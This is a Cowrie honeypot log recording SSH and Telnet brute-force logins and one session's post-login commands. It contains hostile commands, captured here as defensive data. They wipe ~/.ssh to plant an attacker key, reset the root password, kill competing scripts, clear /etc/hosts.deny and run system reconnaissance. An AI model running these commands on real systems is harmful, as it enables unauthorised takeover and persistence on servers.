{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T04:54:47.721179Z","src_ip":"93.123.109.181","session":"60dc9e990c13"}
{"eventid":"cowrie.login.failed","username":"solana","password":"sol","message":"login attempt [solana/sol] failed","sensor":"my-vps","timestamp":"2025-08-26T04:54:47.780493Z","src_ip":"93.123.109.181","session":"60dc9e990c13"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:54:48.802026Z","src_ip":"93.123.109.181","session":"60dc9e990c13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37872,"dst_ip":"1.2.3.4","dst_port":22,"session":"f966f248df03","protocol":"ssh","message":"New connection: 212.227.235.229:37872 (1.2.3.4:22) [session: f966f248df03]","sensor":"my-vps","timestamp":"2025-08-26T04:54:49.635146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:54:49.636029Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:54:49.910144Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.login.success","username":"root","password":"ABCabc123@","message":"login attempt [root/ABCabc123@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:54:51.044782Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37336,"dst_ip":"1.2.3.4","dst_port":22,"session":"0abe55a530c1","protocol":"ssh","message":"New connection: 212.227.235.229:37336 (1.2.3.4:22) [session: 0abe55a530c1]","sensor":"my-vps","timestamp":"2025-08-26T04:54:51.471105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:54:51.471793Z","src_ip":"212.227.235.229","session":"0abe55a530c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:54:51.612288Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:54:51.612959Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:54:51.613779Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:54:51.740385Z","src_ip":"212.227.235.229","session":"0abe55a530c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:54:51.888247Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:54:52.539323Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:54:52.540075Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:54:52.815636Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:54:52.816573Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.login.failed","username":"shop","password":"shop","message":"login attempt [shop/shop] failed","sensor":"my-vps","timestamp":"2025-08-26T04:54:52.856757Z","src_ip":"212.227.235.229","session":"0abe55a530c1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:54:54.127478Z","src_ip":"212.227.235.229","session":"0abe55a530c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41118,"dst_ip":"1.2.3.4","dst_port":22,"session":"45a7bc9eec0f","protocol":"ssh","message":"New connection: 212.227.235.229:41118 (1.2.3.4:22) [session: 45a7bc9eec0f]","sensor":"my-vps","timestamp":"2025-08-26T04:54:58.775295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:54:58.776413Z","src_ip":"212.227.235.229","session":"45a7bc9eec0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58292,"dst_ip":"1.2.3.4","dst_port":23,"session":"368c626a4f30","protocol":"telnet","message":"New connection: 212.227.125.160:58292 (1.2.3.4:23) [session: 368c626a4f30]","sensor":"my-vps","timestamp":"2025-08-26T04:55:07.262632Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:09.116954Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:55:09.117644Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:09.393494Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:10.040995Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"echo \"root:2Z161YB84zZ7\"|chpasswd|bash","message":"CMD: echo \"root:2Z161YB84zZ7\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T04:55:10.041680Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/306f927698eb876488b36978a697986ce910715d2638119254bb581465b9f1fd","size":21,"shasum":"306f927698eb876488b36978a697986ce910715d2638119254bb581465b9f1fd","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/306f927698eb876488b36978a697986ce910715d2638119254bb581465b9f1fd after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:10.318021Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:10.965683Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T04:55:10.966373Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T04:55:11.245347Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:11.246310Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33879,"dst_ip":"1.2.3.4","dst_port":23,"session":"db0acc0bb46c","protocol":"telnet","message":"New connection: 212.227.125.160:33879 (1.2.3.4:23) [session: db0acc0bb46c]","sensor":"my-vps","timestamp":"2025-08-26T04:55:11.797720Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:12.542369Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T04:55:12.543242Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:12.818842Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:13.465316Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T04:55:13.466020Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":26,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:13.740663Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:15.877275Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T04:55:15.878103Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T04:55:15.878608Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.closed","duration":10.00001311302185,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:17.262571Z","src_ip":"212.227.125.160","session":"368c626a4f30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"2.7","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:18.550436Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:18.888117Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T04:55:18.888837Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:19.163854Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:19.756187Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T04:55:19.756878Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:20.031907Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:20.599130Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T04:55:20.599827Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:20.875892Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:21.523788Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:55:21.524519Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:21.801327Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:23.000327Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T04:55:23.001011Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:23.275936Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:23.921295Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T04:55:23.921984Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:24.196684Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:24.798647Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T04:55:24.799345Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.closed","duration":13.09450101852417,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:24.892147Z","src_ip":"212.227.125.160","session":"db0acc0bb46c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:25.074959Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:25.641465Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T04:55:25.642324Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:25.917756Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:26.583992Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T04:55:26.584849Z","src_ip":"212.227.235.229","session":"f966f248df03"}
